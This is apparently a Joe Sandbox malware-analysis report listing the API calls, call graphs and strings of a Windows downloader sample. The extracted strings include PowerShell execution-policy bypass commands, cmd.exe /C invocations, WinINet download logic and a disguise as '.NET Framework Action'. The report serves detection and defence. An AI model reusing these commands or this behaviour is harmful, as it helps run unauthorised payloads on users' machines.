11907->11908 11909 10001a45 11908->11909 11911 10001a64 _com_issue_error 11909->11911 11946 10001bc0 11909->11946 11911->11878 11976 10001b90 11912->11976 11915 10001da0 11993 10001ab0 11915->11993 11917 10001dd9 11918 10001b40 SysFreeString 11917->11918 11919 10001e15 11918->11919 11919->11884 11919->11885 11921 10001ab0 5 API calls 11920->11921 11922 10001e69 11921->11922 11923 10001b40 SysFreeString 11922->11923 11924 10001ea5 11923->11924 11924->11887 11926 10001fc3 memset Process32FirstW 11925->11926 11929 10001fbc 11925->11929 11927 10002074 CloseHandle 11926->11927 11928 10001ff8 WideCharToMultiByte 11926->11928 11927->11929 11930 10002da0 8 API calls 11928->11930 11929->11895 11933 1000202b 11930->11933 11932 10002cb0 _invalid_parameter_noinfo_noreturn 11932->11933 11933->11932 11934 10002051 CloseHandle 11933->11934 11935 1000205f Process32NextW 11933->11935 12000 10003bf0 11933->12000 11934->11929 11935->11927 11935->11928 11937 10002a21 HandleT _Error_objects 11936->11937 12012 10003c80 11937->12012 11939 100028df 11940 10001f10 11939->11940 11941 10001f38 11940->11941 11942 10001f31 11940->11942 11943 10001ab0 5 API calls 11941->11943 11942->11899 11944 10001f54 11943->11944 11945 10001b40 SysFreeString 11944->11945 11945->11942 11949 10016ea0 11946->11949 11948 10001be4 11948->11911 11950 10016f00 11949->11950 11966 10016edd 11949->11966 11953 10016fd3 _com_issue_error 11950->11953 11954 10016f1f MultiByteToWideChar 11950->11954 11952 10016efa 11952->11948 11955 10016fe7 GetLastError 11953->11955 11954->11955 11956 10016f3c 11954->11956 11960 10016ff1 _com_issue_error 11955->11960 11957 10016f64 malloc 11956->11957 11958 10016f4e 11956->11958 11957->11958 11958->11953 11959 10016f9a MultiByteToWideChar 11958->11959 11959->11960 11963 10016fae SysAllocString 11959->11963 11961 10017010 GetLastError 11960->11961 11962 10017007 free 11960->11962 11967 1001701a _com_issue_error 11961->11967 11962->11961 11964 10016fc8 11963->11964 11965 10016fbf free 11963->11965 11964->11953 11964->11966 11965->11964 11968 10016d47 11966->11968 11967->11948 11969 10016d50 IsProcessorFeaturePresent 11968->11969 11970 10016d4f 11968->11970 11972 10016d92 11969->11972 11970->11952 11975 10016d55 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 11972->11975 11974 10016e75 11974->11952 11975->11974 11977 10001b4f 11976->11977 11978 10001b9f 11976->11978 11977->11881 11977->11915 11980 10001c50 11978->11980 11981 10001c6c 11980->11981 11982 10001c82 11980->11982 11981->11982 11984 10001ca0 11981->11984 11982->11977 11987 10001ce0 11984->11987 11986 10001caf _MallocaArrayHolder 11986->11982 11990 10001d00 11987->11990 11989 10001cef 11989->11986 11991 10001d11 SysFreeString 11990->11991 11992 10001d26 _MallocaArrayHolder 11990->11992 11991->11992 11992->11989 11994 10001350 allocator 4 API calls 11993->11994 11995 10001ad5 11994->11995 11997 10001af4 _com_issue_error 11995->11997 11998 10001c00 SysAllocString 11995->11998 11997->11917 11999 10001c32 _com_issue_error 11998->11999 11999->11997 12003 100045f0 12000->12003 12004 1000460a Concurrency::task_continuation_context::task_continuation_context 12003->12004 12007 10004940 12004->12007 12008 10004950 12007->12008 12009 10003bff 12007->12009 12008->12009 12011 100049e0 memcmp 12008->12011 12009->11933 12011->12009 12013 10003c97 12012->12013 12015 10003ca1 Concurrency::task_continuation_context::task_continuation_context 12013->12015 12023 10001410 ?_Xlength_error@std@@YAXPBD 12013->12023 12016 10003ccb 12015->12016 12018 10003d1c 12015->12018 12024 10003770 memcpy 12016->12024 12019 10004820 6 API calls 12018->12019 12020 10003d43 HandleT Concurrency::task_continuation_context::task_continuation_context 12019->12020 12025 10003770 memcpy 12020->12025 12022 10003cef HandleT _Error_objects 12022->11939 12023->12015 12024->12022 12025->12022

                                                                                                                            Executed Functions

                                                                                                                            Function 02620032 Relevance: 70.8, APIs: 2, Strings: 38, Instructions: 795memoryCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • GetNativeSystemInfo.KERNEL32(?), ref: 026204AE
                                                                                                                            • VirtualAlloc.KERNEL32(?,?,00003000,00000004), ref: 026204DE
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2091798263.0000000002620000.00000040.00001000.00020000.00000000.sdmp, Offset: 02620000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_2620000_HGwpjJUqhW.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: AllocInfoNativeSystemVirtual
                                                                                                                            • String ID: A$A$Cach$F$Fu$G$Li$Lo$P$Rt$S$Syst$Ta$Vi$Via$a$a$a$a$b$b$ctio$ee$fo$iv$mI$o$oc$otec$p$st$t$tNat$tu$tu$ucti$ushI$yA
                                                                                                                            • API String ID: 2032221330-2899676511
                                                                                                                            • Opcode ID: 82ef88a58992c726dca534e4f3eff6f5ce2a19202078a525a2214f4ed1b422dd
                                                                                                                            • Instruction ID: 0e8dead19cec794282714b72f21ed02a81c4752e8d289abefa62532313232309
                                                                                                                            • Opcode Fuzzy Hash: 82ef88a58992c726dca534e4f3eff6f5ce2a19202078a525a2214f4ed1b422dd
                                                                                                                            • Instruction Fuzzy Hash: 72629A315087958FD724CF24C880BABBBE5FFA4704F04482DE9C99B352E7749989CB96
                                                                                                                            Function 10002090 Relevance: 42.5, APIs: 19, Strings: 5, Instructions: 504networkfilesleepCOMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            APIs
                                                                                                                            • InternetOpenA.WININET(URLDownloader,00000001,00000000,00000000,00000000), ref: 100020D3
                                                                                                                            • InternetOpenUrlA.WININET(?,?,00000000,00000000,80000000,00000000), ref: 100020EF
                                                                                                                            • fopen.API-MS-WIN-CRT-STDIO-L1-1-0(?,1001844C,?,?,10017512,000000FF), ref: 10002101
                                                                                                                            • HttpQueryInfoW.WININET(?,20000005,00000000,00000004,00000000), ref: 10002136
                                                                                                                            • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 10002153
                                                                                                                              • Part of subcall function 10001D60: VariantInit.OLEAUT32(?), ref: 10001D6B
                                                                                                                              • Part of subcall function 10001D80: VariantClear.OLEAUT32(10002776), ref: 10001D8B
                                                                                                                              • Part of subcall function 10001A20: _com_issue_error.COMSUPP ref: 10001A92
                                                                                                                            • InternetReadFile.WININET(?,?,00001000,?), ref: 1000216E
                                                                                                                            • fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000001,00000000,?), ref: 10002197
                                                                                                                            • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 10002230
                                                                                                                            • fclose.API-MS-WIN-CRT-STDIO-L1-1-0(?), ref: 10002240
                                                                                                                            • InternetCloseHandle.WININET(?), ref: 1000224D
                                                                                                                            • InternetCloseHandle.WININET(?), ref: 10002257
                                                                                                                            • GetParent.USER32(?), ref: 10002261
                                                                                                                            • ShowWindow.USER32(?,00000000,?,000000FF), ref: 10002270
                                                                                                                            • WaitForSingleObject.KERNEL32(00000550,00007530,?,000000FF), ref: 10002282
                                                                                                                            • CoInitializeEx.OLE32(00000000,00000000,?,000000FF), ref: 1000228C
                                                                                                                            • CoCreateInstance.OLE32(1001837C,00000000,00000001,1001836C,00000000), ref: 100022AE
                                                                                                                            • Sleep.KERNEL32(000003E8), ref: 1000291A
                                                                                                                              • Part of subcall function 10001E30: VariantInit.OLEAUT32(?), ref: 10001EAA
                                                                                                                            • Sleep.KERNEL32(000003E8), ref: 1000287F
                                                                                                                              • Part of subcall function 10001FA0: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 10001FAD
                                                                                                                            • exit.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000000), ref: 10002928
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2094553995.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2094527227.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2094747432.0000000010018000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2094802218.000000001001C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2094826573.000000001001D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_10000000_HGwpjJUqhW.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Internet$Variant$CloseCreateHandleInitMessageOpenSendSleep$ClearFileHttpInfoInitializeInstanceObjectParentQueryReadShowSingleSnapshotToolhelp32WaitWindow_com_issue_errorexitfclosefopenfwrite
                                                                                                                            • String ID: .NET Framework Action$.NET Framework Action$.NET Framework Action$Pou$URLDownloader
                                                                                                                            • API String ID: 2588663270-937331142
                                                                                                                            • Opcode ID: c12ea35cdda76ffe251e38f5476c27613d15eb4307dc421cda5f27cfce8636c4
                                                                                                                            • Instruction ID: 1a265d8126e776f6a60fe0a7d1a5fce7a7262b6fb56b0006430606afee9c3406
                                                                                                                            • Opcode Fuzzy Hash: c12ea35cdda76ffe251e38f5476c27613d15eb4307dc421cda5f27cfce8636c4
                                                                                                                            • Instruction Fuzzy Hash: 89427DB4E012289FDB64CF59C895BDDBBB5BF49300F1082DAE909A7355DB30AA85CF50
                                                                                                                            Function 10005760 Relevance: 49.3, APIs: 20, Strings: 6, Instructions: 3822sleepprocesssynchronizationCOMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 158 10005760-1000b26e call 10017290 call 10002da0 call 10002e20 call 10001cd0 call 10011770 call 10012640 call 10001cd0 call 10011770 call 10012640 call 10005400 * 2 call 10002ec0 * 2 call 10004fe0 call 10002cd0 call 10002cb0 call 10004fe0 call 10002cd0 call 10002cb0 GetTempPathA call 10002da0 call 10001cd0 call 10011770 call 10012640 call 10005400 call 10012620 call 10002e20 call 10005250 call 10001cd0 call 10011770 call 10012640 call 10005400 call 100138d0 call 10002cb0 call 10012620 call 10002b60 call 10005520 call 10002b60 call 10002da0 call 10005300 call 10002cb0 Sleep call 10002b60 call 10002da0 call 10001cd0 call 10011770 call 10012640 call 10005400 call 10002e20 call 10005250 call 10002cb0 call 10012620 call 10002cb0 call 10002b60 call 10002da0 call 10001cd0 call 10011770 call 10012640 call 10005400 call 10002e20 call 10005250 call 10002cd0 call 10002cb0 * 2 call 10012620 call 10002cb0 call 100139a0 call 10013a30 * 11 call 10002cb0 * 11 call 10002b60 call 10005520 call 10002b60 call 10002da0 call 10005300 call 10002cb0 Sleep call 10001cd0 call 10011770 call 10012640 call 10005400 call 10001cd0 call 10011770 call 10012640 call 10005400 call 10013890 call 10002cb0 call 10012620 call 10002cb0 call 10012620 call 10002b60 WinExec Sleep call 10001cd0 call 10011770 call 10012640 call 10005400 call 10012620 call 10002b60 call 10001cd0 call 10011770 call 10012640 call 10005400 call 10003bc0 call 10003b90 call 10002cd0 call 10002cb0 * 3 call 10012620 memset call 10002b60 ShellExecuteExA 411 1000b270-1000b277 158->411 412 1000b29b-1000b39e call 10002cb0 * 12 call 10012620 * 2 call 10002cb0 * 2 158->412 414 1000b296 411->414 415 1000b279-1000b295 WaitForSingleObject CloseHandle 411->415 417 1000b3a3-1000b443 Sleep call 10002b60 call 10002da0 call 10005740 call 10002cb0 call 10002b60 call 10002da0 call 10005740 call 10002cb0 call 10002b60 call 10005520 call 10002b60 call 10005520 412->417 478 1000b54e-1000b561 412->478 414->417 415->414 464 1000b448-1000b548 call 10002cb0 * 12 call 10012620 * 2 call 10002cb0 * 2 417->464 464->478
                                                                                                                            APIs
                                                                                                                            • _Smanip.LIBCPMTD ref: 10005DF2
                                                                                                                            • _Smanip.LIBCPMTD ref: 1000A195
                                                                                                                              • Part of subcall function 10005400: HandleT.LIBCPMTD ref: 1000546A
                                                                                                                            • GetTempPathA.KERNEL32(00000104,?,?,?,?,?,?,?,?,000000FF), ref: 1000A35B
                                                                                                                            • _Smanip.LIBCPMTD ref: 1000A3C6
                                                                                                                            • _Smanip.LIBCPMTD ref: 1000A4D7
                                                                                                                              • Part of subcall function 10005520: DeleteFileA.KERNEL32(1000A58A,?,1000A58A,00000000,?,?,?,0000005C,?), ref: 10005527
                                                                                                                              • Part of subcall function 10005300: ??Bios_base@std@@QBE_NXZ.MSVCP140(?,00000022,00000040,00000001), ref: 1000534A
                                                                                                                              • Part of subcall function 10005300: ?write@?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV12@PBD_J@Z.MSVCP140(1000A5BB,000000FF,?), ref: 10005384
                                                                                                                              • Part of subcall function 10005300: SetFileAttributesA.KERNEL32(00000000,00000001), ref: 100053A0
                                                                                                                            • Sleep.KERNEL32(000000C8,?,00000000,?,?,?,?,0000005C,?), ref: 1000A5D3
                                                                                                                            • _Smanip.LIBCPMTD ref: 1000A630
                                                                                                                            • _Smanip.LIBCPMTD ref: 1000A764
                                                                                                                            • Sleep.KERNEL32(000000C8,?,00000000), ref: 1000AB7C
                                                                                                                            • _Smanip.LIBCPMTD ref: 1000ADA7
                                                                                                                            • _Smanip.LIBCPMTD ref: 1000AE64
                                                                                                                            • WinExec.KERNEL32(00000000,00000000), ref: 1000AF3E
                                                                                                                            • Sleep.KERNEL32(000003E8,?,?,?,00000063,?,00000070,?,?,00000000), ref: 1000AF49
                                                                                                                            • _Smanip.LIBCPMTD ref: 1000B046
                                                                                                                            • _Smanip.LIBCPMTD ref: 1000B0E2
                                                                                                                            • memset.VCRUNTIME140(?,00000000,00000038), ref: 1000B20A
                                                                                                                            • ShellExecuteExA.SHELL32(?), ref: 1000B266
                                                                                                                            • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 1000B282
                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 1000B28F
                                                                                                                            • Sleep.KERNEL32(000003E8), ref: 1000B3A8
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2094553995.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2094527227.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2094747432.0000000010018000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2094802218.000000001001C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2094826573.000000001001D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_10000000_HGwpjJUqhW.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Smanip$Sleep$FileHandle$?write@?$basic_ostream@AttributesBios_base@std@@CloseD@std@@@std@@DeleteExecExecuteObjectPathShellSingleTempU?$char_traits@V12@Waitmemset
                                                                                                                            • String ID: .NET Framework Action$/C $\PolicyManagement.xml$cmd.exe /C $powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser"$powershell -ExecutionPolicy Bypass -File
                                                                                                                            • API String ID: 1867003993-3862442261
                                                                                                                            • Opcode ID: 80d0ebcc9d61c77f95a844ef64324c72a0714f6c8a74a08bfa52228ac4023aaa
                                                                                                                            • Instruction ID: c3f484f0cadaf97ba32f422996ffd4aa446fbc6566911116cce282fd85213db7
                                                                                                                            • Opcode Fuzzy Hash: 80d0ebcc9d61c77f95a844ef64324c72a0714f6c8a74a08bfa52228ac4023aaa
                                                                                                                            • Instruction Fuzzy Hash: 2FD36A50D0D6E8C9EB22C2288C587DDBEB55B22749F4441D9819C2A283C7BF1FD9CF66
                                                                                                                            Function 1000A2B4 Relevance: 41.2, APIs: 18, Strings: 5, Instructions: 967sleepprocesssynchronizationCOMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 571 1000a2b4-1000b26e GetTempPathA call 10002da0 call 10001cd0 call 10011770 call 10012640 call 10005400 call 10012620 call 10002e20 call 10005250 call 10001cd0 call 10011770 call 10012640 call 10005400 call 100138d0 call 10002cb0 call 10012620 call 10002b60 call 10005520 call 10002b60 call 10002da0 call 10005300 call 10002cb0 Sleep call 10002b60 call 10002da0 call 10001cd0 call 10011770 call 10012640 call 10005400 call 10002e20 call 10005250 call 10002cb0 call 10012620 call 10002cb0 call 10002b60 call 10002da0 call 10001cd0 call 10011770 call 10012640 call 10005400 call 10002e20 call 10005250 call 10002cd0 call 10002cb0 * 2 call 10012620 call 10002cb0 call 100139a0 call 10013a30 * 11 call 10002cb0 * 11 call 10002b60 call 10005520 call 10002b60 call 10002da0 call 10005300 call 10002cb0 Sleep call 10001cd0 call 10011770 call 10012640 call 10005400 call 10001cd0 call 10011770 call 10012640 call 10005400 call 10013890 call 10002cb0 call 10012620 call 10002cb0 call 10012620 call 10002b60 WinExec Sleep call 10001cd0 call 10011770 call 10012640 call 10005400 call 10012620 call 10002b60 call 10001cd0 call 10011770 call 10012640 call 10005400 call 10003bc0 call 10003b90 call 10002cd0 call 10002cb0 * 3 call 10012620 memset call 10002b60 ShellExecuteExA 786 1000b270-1000b277 571->786 787 1000b29b-1000b39e call 10002cb0 * 12 call 10012620 * 2 call 10002cb0 * 2 571->787 789 1000b296 786->789 790 1000b279-1000b295 WaitForSingleObject CloseHandle 786->790 792 1000b3a3-1000b548 Sleep call 10002b60 call 10002da0 call 10005740 call 10002cb0 call 10002b60 call 10002da0 call 10005740 call 10002cb0 call 10002b60 call 10005520 call 10002b60 call 10005520 call 10002cb0 * 12 call 10012620 * 2 call 10002cb0 * 2 787->792 853 1000b54e-1000b561 787->853 789->792 790->789 792->853
                                                                                                                            APIs
                                                                                                                            • GetTempPathA.KERNEL32(00000104,?,?,?,?,?,?,?,?,000000FF), ref: 1000A35B
                                                                                                                            • _Smanip.LIBCPMTD ref: 1000A3C6
                                                                                                                              • Part of subcall function 10005400: HandleT.LIBCPMTD ref: 1000546A
                                                                                                                            • _Smanip.LIBCPMTD ref: 1000A4D7
                                                                                                                              • Part of subcall function 10005520: DeleteFileA.KERNEL32(1000A58A,?,1000A58A,00000000,?,?,?,0000005C,?), ref: 10005527
                                                                                                                              • Part of subcall function 10005300: ??Bios_base@std@@QBE_NXZ.MSVCP140(?,00000022,00000040,00000001), ref: 1000534A
                                                                                                                              • Part of subcall function 10005300: ?write@?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV12@PBD_J@Z.MSVCP140(1000A5BB,000000FF,?), ref: 10005384
                                                                                                                              • Part of subcall function 10005300: SetFileAttributesA.KERNEL32(00000000,00000001), ref: 100053A0
                                                                                                                            • Sleep.KERNEL32(000000C8,?,00000000,?,?,?,?,0000005C,?), ref: 1000A5D3
                                                                                                                            • _Smanip.LIBCPMTD ref: 1000A630
                                                                                                                            • _Smanip.LIBCPMTD ref: 1000A764
                                                                                                                            • Sleep.KERNEL32(000000C8,?,00000000), ref: 1000AB7C
                                                                                                                            • _Smanip.LIBCPMTD ref: 1000ADA7
                                                                                                                            • _Smanip.LIBCPMTD ref: 1000AE64
                                                                                                                            • WinExec.KERNEL32(00000000,00000000), ref: 1000AF3E
                                                                                                                            • Sleep.KERNEL32(000003E8,?,?,?,00000063,?,00000070,?,?,00000000), ref: 1000AF49
                                                                                                                            • _Smanip.LIBCPMTD ref: 1000B046
                                                                                                                            • _Smanip.LIBCPMTD ref: 1000B0E2
                                                                                                                            • memset.VCRUNTIME140(?,00000000,00000038), ref: 1000B20A
                                                                                                                            • ShellExecuteExA.SHELL32(?), ref: 1000B266
                                                                                                                            • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 1000B282
                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 1000B28F
                                                                                                                            • Sleep.KERNEL32(000003E8), ref: 1000B3A8
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2094553995.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2094527227.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2094747432.0000000010018000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2094802218.000000001001C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2094826573.000000001001D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_10000000_HGwpjJUqhW.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Smanip$Sleep$FileHandle$?write@?$basic_ostream@AttributesBios_base@std@@CloseD@std@@@std@@DeleteExecExecuteObjectPathShellSingleTempU?$char_traits@V12@Waitmemset
                                                                                                                            • String ID: /C $\PolicyManagement.xml$cmd.exe /C $powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser"$powershell -ExecutionPolicy Bypass -File
                                                                                                                            • API String ID: 1867003993-2154795836
                                                                                                                            • Opcode ID: c3072d005594ebe148bccec5f2d8f621a0b2fb80094ec9400a32d8903ee167d9
                                                                                                                            • Instruction ID: 5ee5c772d32b0c25501e7099b99da70bcf1678fc7b94072c772d4481403b0835
                                                                                                                            • Opcode Fuzzy Hash: c3072d005594ebe148bccec5f2d8f621a0b2fb80094ec9400a32d8903ee167d9
                                                                                                                            • Instruction Fuzzy Hash: 88B24C74C08298DEEB25CB68CC45BDEBBB5AF15304F0441D9E14D67292DBB52B88CF62
                                                                                                                            Function 100018D0 Relevance: 21.1, APIs: 9, Strings: 3, Instructions: 87windowthreadCOMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            APIs
                                                                                                                            • InitCommonControlsEx.COMCTL32(00000008), ref: 10001903
                                                                                                                            • GetModuleHandleA.KERNEL32(00000000,00000000), ref: 1000190D
                                                                                                                            • CreateWindowExW.USER32(00000000,msctls_progress32,00000000,50800001,00000014,0000001E,00000159,00000014,00000001,00000065,00000000), ref: 10001933
                                                                                                                            • SetWindowTheme.UXTHEME(0004045C,10018438,10018434), ref: 1000194E
                                                                                                                            • SendMessageW.USER32(0004045C,00000409,00000000,00D77800), ref: 10001967
                                                                                                                            • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(0000000C), ref: 10001978
                                                                                                                            • CreateThread.KERNEL32(00000000,00000000,Function_000019F0,?,00000000,00000000), ref: 100019B9
                                                                                                                            • PostQuitMessage.USER32(00000000), ref: 100019C4
                                                                                                                            • DefWindowProcW.USER32(00000002,?,?,?), ref: 100019DD
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2094553995.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2094527227.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2094747432.0000000010018000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2094802218.000000001001C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2094826573.000000001001D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_10000000_HGwpjJUqhW.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Window$CreateMessage$CommonControlsHandleInitModulePostProcQuitSendThemeThreadmalloc
                                                                                                                            • String ID: $msctls_progress32$3Ro
                                                                                                                            • API String ID: 1181878002-754273676
                                                                                                                            • Opcode ID: f1c3b5bd482cc1038fd523d6cd0664b2522f3065c76e0cbb8d44deae0c0665e8
                                                                                                                            • Instruction ID: 07dac4f513f804ff03a6516b31f22f63e0bdfab53d31000085bea38267b703f6
                                                                                                                            • Opcode Fuzzy Hash: f1c3b5bd482cc1038fd523d6cd0664b2522f3065c76e0cbb8d44deae0c0665e8
                                                                                                                            • Instruction Fuzzy Hash: 03310675A40218FFF750CF94CC9AFAA77B4FB48701F208118FA05AA290C770DA00CB65
                                                                                                                            Function 10001660 Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 179windowregistrythreadCOMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            APIs
                                                                                                                            • GetModuleHandleA.KERNEL32(00000000), ref: 10001682
                                                                                                                              • Part of subcall function 10001430: SHGetKnownFolderPath.SHELL32(10018310,00000000,00000000,00000000), ref: 1000148B
                                                                                                                              • Part of subcall function 10001430: wcstombs.API-MS-WIN-CRT-CONVERT-L1-1-0(?,00000000,00000104), ref: 100014AA
                                                                                                                              • Part of subcall function 10001430: CoTaskMemFree.OLE32(00000000,00000000,?), ref: 100014DE
                                                                                                                            • CreateThread.KERNEL32(00000000,00000000,10005760,00000000,00000000,00000000), ref: 10001798
                                                                                                                            • RegisterClassW.USER32(?), ref: 100017F7
                                                                                                                            • GetSystemMetrics.USER32(00000001), ref: 100017FF
                                                                                                                            • GetSystemMetrics.USER32(00000000), ref: 10001812
                                                                                                                            • CreateWindowExW.USER32(00000000,?,?,00C40000,?,?,00000190,00000078,00000000,00000000,00000000,00000000), ref: 1000185E
                                                                                                                            • ShowWindow.USER32(?,00000001,?,?,?,?,?,?,?,10017426), ref: 1000186D
                                                                                                                            • KiUserCallbackDispatcher.NTDLL(?,00000000,00000000,00000000), ref: 10001894
                                                                                                                            • TranslateMessage.USER32(?), ref: 100018A2
                                                                                                                            • DispatchMessageW.USER32(?), ref: 100018AC
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2094553995.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2094527227.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2094747432.0000000010018000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2094802218.000000001001C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2094826573.000000001001D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_10000000_HGwpjJUqhW.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CreateMessageMetricsSystemWindow$CallbackClassDispatchDispatcherFolderFreeHandleKnownModulePathRegisterShowTaskThreadTranslateUserwcstombs
                                                                                                                            • String ID: URLDownloader
                                                                                                                            • API String ID: 73900685-1891997712
                                                                                                                            • Opcode ID: 427fb0662738fb6037c45c3c081c75d8746fa49f42a236919258716a76932914
                                                                                                                            • Instruction ID: 8631f2352c9d4e8355fdf3fc5455be072e9b283b4b7067b2d869b395449685d5
                                                                                                                            • Opcode Fuzzy Hash: 427fb0662738fb6037c45c3c081c75d8746fa49f42a236919258716a76932914
                                                                                                                            • Instruction Fuzzy Hash: 807110B5D00218EFEB54CFA4CC45FDEBBB4EB48700F108169E619A7295EB74AA44CF51
                                                                                                                            Function 10015820 Relevance: 17.9, APIs: 8, Strings: 2, Instructions: 357filesynchronizationCOMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            APIs
                                                                                                                              • Part of subcall function 10015750: GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 10015783
                                                                                                                              • Part of subcall function 10015700: GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 1001571E
                                                                                                                            • _Smanip.LIBCPMTD ref: 10015B0A
                                                                                                                            • _Smanip.LIBCPMTD ref: 10015BA4
                                                                                                                            • memset.VCRUNTIME140(?,00000000,00000038,?,?,?,0000002F,?,00000070,?), ref: 10015C85
                                                                                                                            • ShellExecuteExA.SHELL32(0000003C,?,?,?,?,?,?,0000002F,?,00000070,?), ref: 10015CE1
                                                                                                                            • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?,?,?,0000002F,?,00000070,?), ref: 10015CFD
                                                                                                                            • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,0000002F,?,00000070,?), ref: 10015D0A
                                                                                                                            • CopyFileA.KERNEL32(00000000,?,00000000), ref: 10015D73
                                                                                                                            • ShellExecuteA.SHELL32(00000000,open,?,00000000,00000000,00000001), ref: 10015D99
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2094553995.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2094527227.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2094747432.0000000010018000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2094802218.000000001001C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2094826573.000000001001D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_10000000_HGwpjJUqhW.jbxd
                                                                                                                            Similarity
